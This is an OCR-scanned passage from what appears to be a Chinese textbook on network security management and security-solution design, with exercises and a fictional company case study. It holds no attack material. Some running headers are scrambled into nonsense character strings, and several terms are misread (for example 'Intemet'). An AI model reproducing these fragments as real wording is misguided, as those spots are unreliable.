(4) 进行 安全 符合 性 检查 ， 包 括 安全 测试 ， 以 确保 安全 性 维持 在 所 要 求 的 水 平 ; 

(5) 为 网 络 连接 指定 文件 化 的 安全 条 件 ， 用 于 在 允许 与 外 部 组 织 或 人 员 进 行 连接 时 
遵守 ; 

(6) 为 网 络 服务 的 使 用 者 制定 文件 化 的 安全 条 件 ; 

(7) 制定 文件 化 并 经 过 测试 的 业务 持续 性 /灾难 恢复 计划 。 

2. 网 络 安全 管理 

任何 网 络 的 管理 应 在 安全 的 方式 下 进行 , 并 提供 对 全 面 的 网 络 安全 管理 的 支持 。 为 此 ， 
需要 充分 考虑 不 同 的 可 用 网 络 协议 和 相关 的 安全 服务 。 网 络 安全 管理 需 考虑 如 下 方面 : 

(1) 联网 要 素 ， 包 括 网 络 用 户 、 网 络 终端 、 网 络 应 用 、 网 络 服务 和 网 络 基础 设施 ; 

(2) 角色 及 其 责任 ， 包 括 高 级 管理 、 网 络 管理 、 网 络 安全 组 、 网 络 日 常 管 理 员 、 网 络 
用 户 和 审核 员 ; 


(3) 网 络 监视 ; 

(4) 网 络 安全 维持 ， 包 括 及 时 打 安 全 补丁 ， 定 期 审核 安全 控制 措施 ， 以 及 评价 新 的 网 
络 技术 的 安全 性 。 

3. 技术 脆弱 性 管理 

与 其 他 复杂 系统 一 样 ， 网 络 系统 也 会 存在 错误 。 网 络 中 常用 组 件 的 技术 脆弱 性 如 果 被 
利用 , 会 给 网 络 的 安全 性 带 来 严重 影响 。 技 术 脆弱 性 管理 应 覆盖 网 络 的 所 有 组 件 ， 应 包括 ; 

(1) 及 时 获得 有 关 技术 脆弱 性 的 信息 ; 

(2) 评价 网 络 暴露 在 这 种 脆弱 性 下 的 程度 ; 

(3) 确定 适当 的 控制 措施 来 处 理 相关 风险 ; 

(4) 实施 和 验证 所 确定 的 控制 措施 。 

4. 标识 与 鉴别 

限定 仅 被 授权 人 员 才 能 经 由 网 络 连接 进行 访问 是 确保 网 络 服务 和 相关 信息 安全 的 重 
要 手段 。 与 网 络 连 接 使 用 相关 的 标识 与 鉴别 控制 区 域 包 括 : 

(1) 远程 登录 ; 

(2) 增强 型 鉴别 ; 

(3) 远程 系统 标识 ; 

(4) 安全 的 单 点 登录 。 

S. 网络 审计 日 志 与 监视 

通过 具体 快速 检测 、 调 查 、 报 告 和 相应 安全 事件 的 审计 日 志和 持续 监视 来 确保 网 络 安 
全 的 有 效 性 是 非常 重要 的 。 和 否则 ， 不 可 能 保证 网 络 安全 控制 措施 总 是 有 效 影响 业务 运行 的 
安全 事件 不 发 生 。 对 于 网 络 连接 ， 审 计 日 志 应 包括 如 下 事件 类 型 

(1) 失败 的 远程 登录 尝试 及 其 日 期 和 时 间 ; 

(2) 失败 的 再 鉴别 (或 令 牌 使 用 〉 事件 ; 

(3) 违背 安全 网 关 策 略 的 通信 ; 

(4) 远程 尝试 访问 审计 日 志 ; 

(5) 有 安全 隐患 的 系统 管理 报警 。 

在 网 络 环境 下 ， 审 计 日 志 的 信息 有 多 种 来 源 〈 如 路 由 器 、 防 火 墙 和 入 侵 检 测 系统 )， 
并 可 被 送 到 一 个 中 央 审 计 服 务 器 进行 合并 和 分 析 。 所 有 的 审计 日 志 都 应 既 能 实时 也 能 离线 
查看 。 

审计 踪迹 应 根据 组 织 的 需要 在 线 保留 一 段 时 间 。 所 有 审计 踪迹 应 以 能 确保 其 完整 性 和 
可 用 性 的 方式 进行 备份 和 存档 ， 如 写 入 CD 这 样 的 一 次 写 入 多 次 读 出 介质 。 审 计 日 志 包含 
敏感 信息 和 证 据 信 息 ， 因 此 有 必要 予以 适当 的 保护 。 另 外 ， 审 计 踪 迹 和 相关 服务 器 的 时 间 
同步 也 是 重要 的 。 持 续 监视 应 包括 如 下 方面 : 

。 来 自 防 火 墙 、 路 由 器 、 服 务 器 等 的 审计 日 志 ; 

。 来 自 事先 设 定 通知 特定 事件 类 型 的 审计 日 志 的 报警 ; 

。 入 侵 检 测 系统 的 输出 ; 

。 网 络 安全 扫描 的 结果 ; 

。 用 户 或 维护 人 员 报 告 的 时 间 信 息 ; 

。 安全 符合 性 的 评审 结果 。 
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网 络 监视 应 以 完全 符合 相关 国家 和 国际 法 律 与 规章 的 方式 进行 。 很 显然 ， 采取 的 监视 
行为 应 与 组 织 的 安全 和 隐私 策略 以 及 具有 相关 责任 的 适当 规程 保持 一 致 。 如 果 网 络 日 志 用 
做 刑事 或 民事 起 诉 的 证 据 ， 网 络 审计 日 志和 监视 还 应 按照 法 律 取证 的 要 求 去 进行 。 

6， 入侵 检测 

随 着 网 络 连 接 的 增加 ， 入 侵 者 有 更 多 入 侵 途 径 。 此 外 ， 入 侵 者 变 得 更 加 老练 ， 互 联网 
上 有 更 多 容易 得 到 的 更 加 先进 的 攻击 方法 和 工具 。 这 些 工 具 中 的 许多 都 是 自动 的 、 非 常 有 
效 的 且 易于 使 用 的 ， 连 经 验 有 限 的 新 手 都 可 以 利用 。 

防止 所 有 的 潜在 渗透 攻击 是 不 可 能 的 ， 结 果 是 总 会 发 生 一 些 不 同 程度 的 成 功 入 侵 。 对 
付 这 种 风险 除了 实施 良好 的 识别 与 鉴别 、 逻 辑 访问 控制 和 核查 与 审计 外 ， 如 果 合 理 ， 还 应 
配 以 入 侵 检 测 能 力 。 这 种 能 力 提供 预知 入 侵 、 识 别 入 侵 和 发 出 适当 报警 的 手段 。 它 能 够 收 
集 入 侵 信 息 进 行 合 并 和 分 析 ， 还 可 以 分 析出 一 个 组 织 正 常 的 信息 系统 行为 /使 用 模式 ， 用 以 
识别 异常 行为 /使 用 。 

在 许多 情况 下 ， 可 能 清楚 某 种 未 授权 或 有 害 事件 正在 发 生 。 它 可 能 是 不 明 原 因 的 服务 
性 能 下 降 ， 也 可 能 是 拒绝 特定 服务 。 重 要 的 是 要 尽 可 能 地 知道 入 侵 的 原因 、 严 重 性 和 范围 ， 
以 便 采取 应 对 措施 。 

入 侵 检测 能 力 相对 于 审计 日 志 分 析 工 具 和 方法 更 加 复杂 。 更 加 有 效 的 入 侵 检 测 能 力 是 
使 用 后 台 处 理 器 ， 依 据 给 定 的 规则 ， 自 动 分 析 在 审计 踪迹 和 其 他 日 志 中 记录 的 过 去 行为 来 
预知 入 侵 ， 以 及 从 审计 踪迹 中 分 析出 恶意 行为 或 非 正常 使 用 行为 的 模式 。 入 侵 检 测 系 统 
(IDS) 有 如 下 两 种 类 型 : 

(1) 网 络 入 侵 检 测 系统 监视 网 络 上 的 数据 包 ， 并 通过 与 已 知 攻击 模式 进行 匹配 来 试图 


发 现 入 侵 行为 ; 
(2) 主机 入 侵 检 测 系统 监视 主机 的 活动 ， 并 通过 查看 安全 事件 日 志 或 检查 对 系统 的 改 
变 来 发 现 入 侵 行为 。 


在 某 些 情况 下 ， 对 检测 出 的 入 侵 的 响应 可 以 通过 入 侵 防护 系统 来 自动 实现 。 

7， 防范 恶意 代码 

用 户 应 意识 到 恶意 代码 〈 包 括 病毒 ) 可 能 通过 网 络 连接 进入 他 们 的 计算 环境 。 恶 意 代 
码 可 以 引起 计算 机 执行 非 授权 的 功能 ， 一 旦 发 现 脆弱 的 主机 便 在 其 上 复制 自己 。 恶意 代码 
在 损害 发 生 之 前 不 太 可 能 被 检测 出 来 ， 除 非 实施 了 适当 的 控制 。 恶 意 代 码 可 能 导致 安全 控 
制 措施 的 损坏 、 不 期 望 的 信息 泄露 、 不 期 望 的 信息 改变 、 信 息 损 坏 或 系统 资源 的 非 授 权 
使 用 。 

某 些 恶 意 代 码 可 以 被 专门 的 扫描 软件 检测 出 并 移 除 。 这 种 扫描 器 可 用 在 防火 墙 、 文 件 
服务 器 、 邮 件 服 务 器 和 工作 站 来 封杀 某 些 类 型 的 恶意 代码 。 为 了 检测 出 新 的 恶意 代码 ， 通 
过 每 天 升级 确保 扫描 软件 总 是 最 新 非常 重要 。 但 是 ， 用 户 和 管理 员 不 应 指望 这 种 扫描 器 能 
够 检测 出 所 有 恶意 代码 ， 因 为 新 的 恶意 代码 形式 不 断 出 现 。 通 常 需要 其 他 形式 的 控制 来 加 
强 扫描 器 所 提供 的 保护 。 

总 体 来 说 ， 由 反 恶 意 代码 软件 来 扫描 数据 和 程序 ， 以 识别 类 似 于 病毒 、 蠕 虫 和 木马 模 
式 的 可 疑 之 处 。 扫 描 用 的 模式 库存 储 着 恶意 代码 的 特征 ， 应 定期 更 新 或 在 新 的 特征 可 用 时 
进行 更 新 。 

带 有 网 络 连 接 的 系统 的 用 户 和 管理 员 应 意识 到 ， 当 通过 外 部 链 路 与 外 部 进行 交互 时 ， 


恶意 代码 比 通常 情况 下 具有 更 大 的 风险 。 应 为 用 户 和 管理 员 开发 最 小 化 恶意 代码 引入 可 能 
性 的 规程 和 实践 指南 。 
用 户 和 管理 员 应 特别 小 心地 配置 与 网 络 连接 有 关 的 系统 和 应 用 ， 关 闭 不 必要 的 功能 。 
.基于 密码 基础 设施 的 服务 
随 着 电子 副本 逐渐 代替 纸 质 副 本 ， 对 电子 数据 的 安全 和 隐私 的 保护 需求 在 不 断 增长 。 
互联 网 的 出 现 和 组 织 网 络 扩展 到 能 够 让 组 织 外 部 的 客户 和 供应 商 进行 访问 ， 加 速 了 对 基于 
密码 的 安全 解决 方案 的 需求 , 以 支持 鉴别 和 VPN 以 及 确保 保密 性 。 密码 基础 设施 支持 的 服 
务 包括 : 

(1) 网 上 数据 的 保密 性 一 一 采用 加 密 机 制 实现 ; 

(2) 网 上 数据 的 完整 性 一 一 采用 数字 签名 和 数据 完整 性 机 制 实现 ; 

(3) 不 可 否认 性 一 一 对 于 一 般 的 不 可 否认 要 求 ， 可 考虑 采用 通信 协议 、 应 用 协议 和 网 
关 等 手段 实现 ， 对 于 较 高 的 不 可 否认 要 求 ， 采 用 数字 签名 机 制 实现 ; 

(4) 密 钥 管理 一 一 采用 PKI 和 Smartcard 技术 。 

9. 业务 持续 性 管理 

当 灾 难 发 生 时 ， 重 要 的 是 有 控制 措施 能 够 通过 提供 在 适当 的 时 间 框 架 内 恢复 业务 各 部 
分 的 能 力 来 确保 业务 持续 运行 。 因 此 ， 一 个 组 织 应 具备 业务 持续 性 管理 程序 ， 该 程序 具有 
履 盖 所 有 的 业务 持续 性 阶段 的 过 程 ， 包 括 建 立业 务 恢复 优先 级 、 时 间 表 和 要 求 ， 明 确 业务 
持续 性 策略 ， 制 定 业务 持续 性 计划 ， 测 试 业 务 持 续 性 计划 ， 确 保 所 有 员工 的 业务 持续 性 意 
识 ， 维 护 业 务 持 续 性 计划 和 降低 风险 。 

从 网 络 连 接 视角 看 ， 就 是 要 关注 维持 网 络 连 接 ， 实 施 具 有 足够 容量 的 备 选 连接 ， 在 有 
害 事 件 后 恢复 连接 。 这 些 方面 及 其 要 求 应 基于 连接 对 业务 运行 的 重要 程度 和 中 断 事件 对 业 
务 的 负面 影响 。 连 接 性 给 组 织带 来 许多 好 处 的 同时 ， 当 发 生 连 接 中 断 事件 时 ， 却 可 能 会 因 
为 为 脆弱 性 和 单 点 失效 ， 给 组 织造 成 破坏 性 的 影响 。 


14.9 ”实施 和 运行 安全 控制 措施 
一 旦 技术 性 网 络 安全 体系 结构 及 其 安全 控制 措施 得 到 识别 、 文 件 化 和 协商 一 致 ， 网 络 
安全 控制 措施 就 应 得 到 实现 。 在 允许 网 络 运行 开始 前 ， 实 施 应 得 到 评审 和 测试 ， 并 且 发 现 
的 任何 安全 不 足 都 应 得 到 处 理 。 在 安全 性 得 到 高 层 管理 批准 后 ， 方 可 投入 运行 。 随 着 时 间 
的 推移 及 当 发 生 重大 变化 时 ， 应 进一步 实施 评审 。 


14.10 ”监视 和 评审 实施 


首次 实施 应 得 到 评审 ， 以 确保 与 如 下 文档 中 规定 的 技术 性 安全 体系 结构 和 所 要 求 的 安 
全 控制 措施 一 致 : 

。 技术 性 安全 体系 结构 ; 

。 联网 完全 策略 ; 

。 相关 的 安全 运行 规程 ; 

。 安全 网 关 服务 访问 策略 ; 
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。 业务 连续 性 计划 ; 

。 安全 连接 条 件 。 

一 致 性 评审 应 在 投入 运行 前 完成 。 只 有 当 所 有 的 安全 不 足 被 识别 、 修 正 并 得 到 高 层 管 
理 的 认可 ， 这 种 评审 才 是 最 完整 的 。 投 入 运行 后 ， 也 应 持续 进行 监视 和 评审 活动 ， 包 括 当 
业务 需求 、 技 术 和 安全 解决 方案 等 发 生 重大 变化 时 和 每 年 定期 的 活动 。 

值得 强调 的 是 ， 进 行 安全 测试 实现 应 有 安全 测试 策略 和 相关 的 测试 计划 来 确定 测试 什 
么 、 在 哪里 和 什么 时 间 。 通 常 ， 测 试 包括 漏洞 扫描 和 渗透 测试 。 在 开始 这 种 测试 前 ， 应 检 
查 测试 计划 ， 以 确保 测试 将 以 完全 符合 相关 法 律 和 规定 的 方式 进行 。 检 查 时 应 记 住 网 络 可 
E 不 局 限于 一 个 国家 内 ， 它 可 能 分 布 到 具有 不 同 法 律 的 不 同 国家 。 测 试 报告 应 指出 所 遇 到 
的 脆弱 性 的 详细 情况 和 所 需要 的 修正 以 及 处 理 的 优先 级 ， 并 附 上 确认 所 有 修正 已 经 实施 的 
内 容 。 测 试 报告 应 得 到 高 层 管理 的 批准 。 


思考 与 练习 
， 简 述 网 络 安全 管理 过 程 。 
， 网 络 连接 类 型 是 如 何 划分 的 ? 


.如何 识别 网 络 环境 中 的 信任 关系 ?信任 关系 有 哪些 类 型 ? 
.阐述 安全 风险 识别 的 用 途 和 作用 。 

， 列 出 网 络 安全 的 控制 区 域 。 

. 何 时 进行 评审 活动 ? 

.对 于 安全 测试 有 哪些 注意 事项 ? 
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第 15 章 网 络 安全 方案 设计 


本 章 学 习 目标 : 
。 理解 网 络 安全 方案 的 基本 概念 ; 
。 重点 掌握 如 何 根据 需求 写 出 一 份 完 整 的 网 络 安全 的 解决 方案 。 


15.1 网 络 安全 方案 概念 


网 络 安全 方案 可 以 认为 是 一 张 施工 的 图 纸 ， 图 纸 的 好 坏 直 接 影响 到 工程 的 质量 高 低 。 
总 的 来 说 ， 网 络 安全 方案 涉及 的 内 容 比 较 多 、 比 较 广 、 比 较 专业 和 实际 。 
15.1.1 评价 网 络 安全 方案 的 质量 

- 份 网 络 安全 方案 需要 从 以 下 8 个 方面 来 把 握 。 

(1) 体现 唯一 性 。 由 于 安全 的 复杂 性 和 特殊 性 ， 唯 一 性 是 评估 安全 方案 最 重要 的 一 个 
标准 。 实 际 中 ， 每 一 个 特定 网 络 都 是 唯一 的 ， 需 要 根据 实际 情况 来 处 理 。 

(2) 对 安全 技术 和 安全 风险 有 一 个 综合 把 握 和 理解 ， 包 括 现在 和 将 来 可 能 出 现 的 所 有 
情况 。 

(3) 对 用 户 的 网 络 系统 可 能 遇 到 的 安全 风险 和 安全 威胁 ， 结 合 现 有 的 安全 技术 和 安全 
风险 ， 要 有 一 个 合适 、 中 肯 的 评估 ， 不 能 夸大 ， 也 不 能 缩小 。 

(4) 对 症 下 药 。 用 相应 的 安全 产品 、 安 全 技术 和 管理 手段 降低 用 户 的 网 络 系统 当前 可 
能 遇 到 的 风险 和 威胁 , 消除 风险 和 威胁 的 根源 , 增强 整个 网 络 系统 抵抗 风险 和 威胁 的 能 
增强 系统 本 身 的 免疫 力 。 

(5) 方案 中 要 体现 出 对 用 户 的 服务 支持 。 这 是 很 重要 的 一 部 分 。 因 为 产品 和 技术 都 将 
会 体现 在 服务 中 ， 服 务 来 保证 质量 ， 服 务 来 提高 质量 。 

(6) 在 设计 方案 的 时 候 ， 要 明白 网 络 系统 安全 是 一 个 动态 的 、 整 体 的 、 专 业 的 工程 ， 
不 能 一 步 到 位 解决 用 户 所 有 的 问题 。 

(7) 方案 出 来 后 ， 要 不 断 地 和 用 户 进行 沟通 ， 能 够 及 时 地 得 到 他 们 对 网 络 系统 在 安全 
方面 的 要 求 、 期 望 和 所 遇 到 的 问题 。 

(8) 方案 中 所 涉及 的 产品 和 技术 ， 都 要 经 得 起 验证 、 推 殴 和 实施 ， 要 有 理论 根据 ， 也 
要 有 实际 基础 。 

将 上 面 的 8 点 融会 贯通 , 经 过 不 断 地 积累 经 验 , 就 能 写 出 一 份 很 实用 的 安全 项 目 方案 。 


1S.1.2 网络 安全 方案 的 框架 
总 体 上 说 ， 一 份 安全 解决 方案 的 框架 涉及 6 大 方面 ， 可 以 根据 用 户 的 实际 需求 取舍 其 
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中 的 某 些 方面 。 

1. 概要 安全 风险 分 析 

对 当前 的 安全 风险 和 安全 威胁 做 一 个 概括 和 分 析 ， 最 好 能 够 突出 用 户 所 在 的 行业 ， 并 
结合 其 业务 的 特点 、 网 络 环境 和 应 用 系统 等 。 同 时 ， 要 有 针对 性 ， 如 政府 行业 、 电 力行 业 
及 金融 行业 等 ， 要 体现 很 强 的 行业 特点 ， 使 人 信服 和 接受 。 

2. 实际 安全 风险 分 析 

实际 安全 风险 分 析 一 般 从 4 个 方面 进行 分 析 。 

(1) 确定 要 保护 的 资产 及 价值 。 如 果 不 知道 要 保护 什么 内 容 ， 或 者 不 知道 要 保护 内 容 
的 情况 ， 那 就 谈 不 上 安全 了 。 明 确 要 保护 的 资产 、 资 产 的 位 置 及 资产 的 重要 性 是 安全 风险 
分 析 的 关键 。 

(2) 分 析 信息 资产 之 间 的 相互 依赖 性 。 由 于 某 项 资产 的 损失 可 能 会 导致 其 他 资产 的 失 
效 ， 因 此 ， 在 确定 资产 的 时 候 还 要 考虑 资产 之 间 的 关联 性 。 

(3) 确定 存在 的 风险 和 威胁 。 确 定 了 要 保护 的 资产 后 ， 就 应 该 分 析 对 资产 的 潜在 威胁 
以 及 受 此 威胁 的 可 能 性 。 威 胁 可 以 是 任何 可 能 对 资产 造成 损失 的 个 人 、 对 象 或 事件 ， 威 胁 
也 可 能 是 故意 的 或 偶然 的 。 明 确 存 在 哪些 弱点 漏洞 及 这 些 弱 点 漏洞 的 风险 级 别 ， 分 析 资 产 
所 面临 的 威胁 、 发 生 的 可 能 性 以 及 一 旦 出 现 安全 问题 ， 可 能 造成 什么 样 的 影响 等 。 

(4) 分 析 可 能 的 入 侵 者 。 要 分 析 可 能 的 入 侵 者 存在 的 数量 ， 进 行 攻击 的 可 能 性 ， 进 行 
攻击 时 威胁 有 多 大 等 。 

3， 网 络 系统 的 安全 原则 

安全 原则 体现 在 5 个 方面 : 动态 性 、 唯 一 性 、 整 体 性 、 专 业 性 和 严密 性 。 

(1) 动态 性 : 不 要 把 安全 静态 化 ， 动 态 性 是 安全 的 一 个 重要 的 原则 。 网 络 、 系 统 和 应 
用 会 不 断 出 现 新 的 风险 和 威胁 ， 这 决定 了 安全 动态 性 的 重要 性 。 

(2) 唯一 性 : 安全 的 动态 性 决定 了 安全 的 唯一 性 ， 针 对 每 个 网 络 系统 安全 的 解决 ， 都 
应 该 是 独一无二 的 。 

(3) 整体 性 : 对 于 网 络 系统 所 遇 到 的 风险 和 威胁 ， 要 从 整体 来 分 析 和 把 握 ， 不 能 哪里 
有 问题 就 补 哪里 ， 要 做 到 全 面 地 保护 和 评估 。 

(4) 专业 性 : 对 于 用 户 的 网 络 、 系 统 和 应 用 ， 要 从 专业 的 角度 来 分 析 和 把 握 ， 不 能 是 
一 种 大 概 的 做 法 。 

(5) 严密 性 : 整个 解决 方案 ， 要 有 一 种 很 强 的 严密 性 ， 不 要 给 人 一 种 虚假 的 感觉 ， 在 
设计 方案 的 时 候 ， 需 要 从 多 方面 对 方案 进行 论证 。 

4. 安全 产品 

常用 的 安全 产品 有 5 种 : 防火墙、 防 病 毒 、 身 份 认 证 、 传 输 加 密 和 入 侵 检测 。 结 合用 
户 的 网 络 、 系 统 和 应 用 的 实际 情况 ， 对 安全 产品 和 安全 技术 做 比较 和 分 析 ， 分 析 要 客观 、 
结果 要 中 肯 ， 帮 助 用 户 选 择 最 能 解决 他 们 所 遇 到 问题 的 产品 ， 不 要 求 新 、 求 好 和 求 大 。 

(1) 防火 墙 : 对 包 过 滤 技 术 、 代 理 技术 和 状态 检测 技术 的 防火 墙 ， 都 做 一 个 概括 和 比 
较 ， 结 合用 户 网 络 系统 的 特点 ， 帮 助 用 户 选择 一 种 安全 产品 ， 对 于 选择 的 产品 ， 一 定 要 从 
中 立 的 角度 来 说 明 。 

(2) 防 病毒 : 针对 用 户 的 系统 和 应 用 的 特点 ， 对 桌面 防 病毒 、 服 务 器 防 病毒 和 网 络 防 
病毒 做 一 个 概括 和 比较 ， 详 细 指出 用 户 必 须 如 何 做 ， 否 则 就 会 带 来 什么 的 安全 威胁 ， 一 定 


要 中 肯 、 合 适 ， 不 要 夸大 和 缩小 。 

(3) 身份 认证 : 从 用 户 的 系统 和 用 户 的 认证 的 情况 进行 详细 的 分 析 ， 指 出 网 络 和 应 用 
本 身 的 认证 方法 会 出 现 哪些 风险 ， 结 合 相关 的 产品 和 技术 ， 通 过 部 署 这 些 产 品 和 采用 相关 
的 安全 技术 ， 能 够 帮助 用 户 解 决 系统 和 应 用 的 传统 认证 方式 所 带 来 的 风险 和 威胁 。 

(4) 传输 加 密 : 要 用 加 密 技术 来 分 析 ， 指 出 明文 传输 的 巨大 危害 ， 通 过 结合 相关 的 加 
密 产 品 和 技术 ， 能 够 指出 用 户 的 现在 情况 存在 哪些 危害 和 风险 。 

(5) 入 侵 检测 : 对 入 侵 检测 技术 要 有 一 个 详细 的 解释 ， 指 出 在 用 户 的 网 络 和 系统 部 署 
了 相关 的 产品 之 后 ， 对 现 有 的 安全 情况 会 产生 一 个 怎样 的 影响 。 结 合 相关 的 产品 和 技术 ， 
指出 用 户 的 系统 和 网 络 会 带 来 哪些 好 处 ， 指 出 为 什么 必须 要 这 样 做 ， 不 这 样 做 会 怎么 样 ， 
会 带 来 什么 样 的 后 果 。 

S， 风险 评估 

风险 评估 是 网 络 安全 防御 中 的 一 项 重要 技术 ， 也 是 信息 安全 工程 学 的 重要 组 成 部 分 。 
其 原理 是 对 采用 的 安全 策略 和 规章 制度 进行 评审 ， 发 现 不 合理 的 地 方 ， 采 用 模拟 攻击 的 形 
式 对 目标 可 能 存在 的 已 知 安全 漏洞 进行 逐 项 检查 ， 确 定 存在 的 安全 隐患 和 风险 级 别 。 

6. 安全 服务 

安全 服务 不 是 产品 化 的 东西 ， 而 是 通过 技术 向 用 户 提 供 的 持久 支持 。 对 于 不 断 更 新 的 
安全 技术 、 安 全 风险 和 安全 威胁 ， 安 全 服务 的 作用 变 得 越 来 越 重 要 。 

(1) 网 络 拓扑 安全 : 结合 网 络 的 风险 和 威胁 ， 详 细 分 析 用 户 的 网 络 拓扑 结构 ， 根 据 其 
特点 ， 指 出 现在 或 将 来 会 存在 哪些 安全 风险 和 威胁 ， 并 运用 相关 的 产品 和 技术 ， 来 帮助 用 
户 消除 产 生 风险 和 威胁 的 根源 。 

(2) 系统 安全 加 固 : 通过 风险 评估 和 人 工分 析 ， 找 出 用 户 的 相关 系统 已 经 存在 或 是 将 
来 会 存在 的 风险 和 威胁 ， 并 运用 相关 的 产品 和 技术 ， 来 加 固 用 户 的 系统 安全 。 

(3) 应 用 安全 : 结合 用 户 的 相关 应 用 程序 和 后 台 支 撑 系 统 ， 通 过 相应 的 风险 评估 和 人 
工分 析 ， 找 出 用 户 和 相关 应 用 已 存在 或 是 将 来 会 存在 的 风险 ， 并 运用 相关 的 产品 和 技术 ， 
来 加 固 用 户 的 应 用 安全 。 

(4) 灾难 恢复 结合 用 户 的 网 络 、 系 统 和 应 用 ， 通 过 详细 的 分 析 ， 针 对 可 能 遇 到 的 灾 
难 ， 制 定 出 一 份 详细 的 恢复 方案 ， 把 由 于 其 他 突 发 情况 所 带 来 的 风险 降 到 最 低 ， 并 有 一 个 
良好 的 应 付 方案 。 

(5) 安全 规范 : 指定 出 一 套 完善 的 安全 方案 ， 比 如 卫 地 址 绑 定 、 离 开 计算 机 时 需要 锁 
定 等 。 结 合 实际 分 成 多 套 方案 ， 如 系统 管理 员 安全 规范 、 网 络 管理 员 安 全 规范 、 高 层 领导 
的 安全 规范 、 普 通 员工 的 管理 规范 、 设 备 使 用 规范 和 安全 环境 规范 。 

(6) 服务 体系 和 培训 体系 : 提供 售 前 和 售后 服务 ， 并 提供 安全 产品 和 技术 的 相关 培训 。 


15.2 网络 安全 案例 需求 
网 络 安全 的 唯一 性 和 动态 性 决定 了 不 同 的 网 络 需要 有 不 同 的 解决 方案 。 下 面 通过 一 个 


实际 案例 ， 可 以 提高 安全 方案 设计 能 
项 目 名 称 中 常 盛 信息 集团 公司 〈 公 司 名 为 虚构 ) 网 络 安全 方案 。 


网 乡 倪 会 方 美 三 矿 


司 经 颁 会 扩大 理 雁 与 笑 路 


1. 案例 背景 

(1) 为 了 保证 网 络 出 口 稳定 可 靠 性 : 企业 向 ISP 申请 了 两 条 Intemet 线路 ， 需 要 这 两 
条 线路 做 负载 均衡 和 宛 余 备份 。 

(2) 管理 性 : 网 络 设备 需 能 够 支持 灵活 多 样 的 管理 方式 ， 可 以 减轻 管理 、 维 护 的 难度 。 

2. 项 目 要 求 

公司 在 网 络 安全 方面 提出 了 5 方面 的 要 求 。 

1) 安全 性 

全 面 有 效 地 保护 企业 网 络 系统 的 安全 ， 保 护 计 算 机 硬件 、 软 件 、 数 据 、 网 络 不 因 偶 然 
的 或 恶意 破坏 的 原因 遭 到 更 改 、 汇 漏 和 丢失 ， 确 保 数据 的 完整 性 。 

2) 可 控 性 和 可 管理 性 

可 自动 和 手动 分 析 网 络 安全 状况 ， 适 时 检测 并 及 时 发 现 记录 潜在 的 安全 威胁 ， 制 定安 
全 策略 ， 及 时 报警 、 阻 断 不 良 攻 击 行为 ， 具 有 很 强 的 可 控 性 和 可 管理 性 。 

3) 系统 的 可 用 性 

在 某 部 分 系统 出 现 问题 时 ， 不 影响 企业 信息 系统 的 正常 运行 ， 具 有 很 强 的 可 用 性 和 及 
时 恢复 性 。 


4) 可 持续 发 展 

满足 公司 业务 需求 和 企业 可 持续 发 展 的 要 求 ， 具 有 很 强 的 可 扩展 性 和 柔韧 性 。 

5) 合法 性 

所 采用 的 安全 设备 和 技术 具有 我 国安 全 产品 管理 部 门 的 合法 认证 。 

3. 工作 任务 

该 项 目的 工作 任务 在 于 4 个 方面 。 

(1) 研究 公司 计算 机 网 络 系统 的 运行 情况 ， 对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 
定性 与 定量 的 分 析 和 评估 。 


(2) 研究 公司 的 计算 机 操作 系统 的 运行 情况 ， 在 操作 系统 最 新 发 展 趋势 的 基础 上 ， 对 
操作 系统 本 身 的 缺陷 及 可 能 承担 的 风险 进行 定性 和 定量 的 分 析 和 评估 。 

(3) 研究 公司 的 计算 机 应 用 系统 的 运行 情况 ， 满 足 各 级 管理 人 员 、 业 务 操 作 人 员 的 业 
务 需 求 的 基础 上 ， 对 应 用 系统 存在 的 问题 、 面 临 的 威胁 及 可 能 承担 的 风险 进行 定性 和 定量 
的 分 析 和 评估 。 

(4) 根据 以 上 的 定性 和 定量 的 评估 ， 结 合用 户 需 求 和 国内 外 网 络 安全 最 新 发 展 趋势 ， 
有 针对 地 制定 公司 计算 机 网 络 系统 的 安全 策略 和 解决 方案 ， 确 保 该 公司 计算 机 网 络 信息 系 
统 安全 可 靠 地 运行 。 

4. 案例 拓扑 结构 

案例 拓扑 结构 如 图 15-1 所 示 。 

S， 地址 规划 

地 址 规划 如 表 15-1 所 示 。 


R3662 R3662 


$2126G S2126G S2126G $2126G 


图 15-1 拓扑 结构 


表 15-1 地 址 规划 表 


设备 IP 地 址 备注 
R2624-A 192.168.1.253/24 R2624-AE0 
R2624-B 192.168.1.254/24 R2624-B E0 
虚拟 备份 组 10 192.168.1.1/24 虚拟 备份 组 10 
虚拟 备份 组 20 192.168.1.2/24 虚拟 备份 组 20 


15.3 ”解决 方案 设计 


安 卓 网 络 安全 公司 〈 公 司 名 为 虚构 ) 通过 招标 ， 以 150 万 的 工程 造价 得 到 了 该 项 目的 
实施 权 。 在 解决 方案 设计 中 需要 包含 9 方面 的 内 容 公司 背景 简介 、 安 全 风险 分 析 、 完 整 
网 络 安全 实施 方案 的 设计 、 实 施 方案 计划 、 技 术 支 持 和 服务 承诺 、 产 品 报价 、 产 品 介绍 、 
第 三 方 检测 报告 和 安全 技术 培训 。 

一 份 网 络 安全 设计 方案 应 该 包括 9 个 方面 : 公司 背景 简介 、 安 全 风险 分 析 、 解 决 方案 、 
实施 方案 、 技 术 支 持 和 服务 承诺 、 产 品 报价 、 产 品 介绍 、 第 三 方 检 测报 告 和 安全 技术 培训 。 

1. 公司 背景 简介 

介绍 安 草 网 络 安全 公司 的 背景 需要 包括 : 公司 简介 、 公 司 人 员 结 构 、 曾 经 成 功 的 案例 、 

品 或 者 服务 的 许可 证 或 认证 以 及 项 目 意义 。 

1) 安 卓 网 络 安全 公司 简介 

让 用 户 对 公司 有 一 个 好 的 印象 ， 可 以 使 我 们 的 工作 更 顺利 地 得 以 执行 和 完成 ， 在 这 里 
不 仅 要 介绍 公司 的 背景 ， 还 要 体现 出 公司 的 优越 性 、 实 力 及 公司 的 先进 性 。 


网 乡 交 会 方 美 砍 矿 


克 乡 委 会 页 大 理论 与 笑 践 


2) 公司 的 人 员 结 构 

公司 的 人 员 结 构 是 用 户 了 解 公 司 实力 的 一 个 最 直接 途径 ， 是 一 份 必 不 可 少 的 材料 。 

3) 成 功 的 案例 

这 里 主要 介绍 公司 以 往 的 成 功 案例 ， 特 别 是 要 指出 与 用 户 项 目 相 似 的 成 功 案例 ， 这 样 
可 以 使 用 户 相信 我 们 有 足够 的 经 验 来 做 好 这 件 事情 。 

4) 产品 的 许可 证 或 服务 的 认证 

